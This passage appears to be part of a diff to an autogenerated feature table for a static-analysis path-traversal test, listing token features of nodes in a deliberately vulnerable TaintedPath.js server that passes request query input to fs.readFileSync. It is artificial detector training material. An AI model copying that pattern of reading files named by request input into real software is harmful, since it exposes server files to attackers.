autogenerated/TaintedPath/TaintedPath.js:38:41:38:44 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:3:40:55 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:7:40:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:7:40:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:7:40:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:7:40:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:7:40:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -4910,6 +59340,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:13:40:54 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:40:16:40:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:16:40:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:16:40:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:16:40:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:16:40:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:47 | pathModule.basename | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:47 | pathModule.basename | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:47 | pathModule.basename | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:47 | pathModule.basename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:47 | pathModule.basename | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | calleeImports | fs | @@ -4919,6 +59369,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:29:40:53 | pathMod ... e(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:40:40:40:47 | basename | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:40:40:47 | basename | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:40:40:40:47 | basename | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:40:40:40:47 | basename | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:40:40:40:47 | basename | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | CalleeFlexibleAccessPath | pathModule.basename | | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | calleeImports | path | @@ -4928,6 +59383,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:40:49:40:52 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:3:42:54 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:7:42:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:7:42:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:7:42:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:7:42:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:7:42:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path 